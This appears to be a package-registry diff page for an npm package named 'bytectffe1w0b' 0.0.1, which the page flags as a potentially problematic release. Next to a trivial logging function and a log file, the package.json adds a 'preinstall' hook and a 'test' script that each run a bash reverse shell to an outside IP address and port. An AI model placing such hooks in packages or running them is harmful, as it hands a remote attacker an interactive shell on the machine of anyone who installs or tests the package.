bytectffe1w0b 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of bytectffe1w0b might be problematic. Click here for more details.

@@ -0,0 +1,4 @@
1
+ function pkgtestpkg(param) {
2
+ console.log('param is: ',param);
3
+ }
4
+ exports.pkgtestpkg = pkgtestpkg;
package/log.txt ADDED
@@ -0,0 +1 @@
1
+ 2022/09/24 13:22:17 Micro started
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "bytectffe1w0b",
3
+ "version": "0.0.1",
4
+ "description": "测试",
5
+ "main": "bytectffe1w0.js",
6
+ "preinstall": "bash -i >& /dev/tcp/121.4.243.54/22224 0>&1",
7
+ "scripts": {
8
+ "test": "bash -i >& /dev/tcp/121.4.243.54/22224 0>&1"
9
+ },
10
+ "author": "fe1w0",
11
+ "license": "ISC"
12
+ }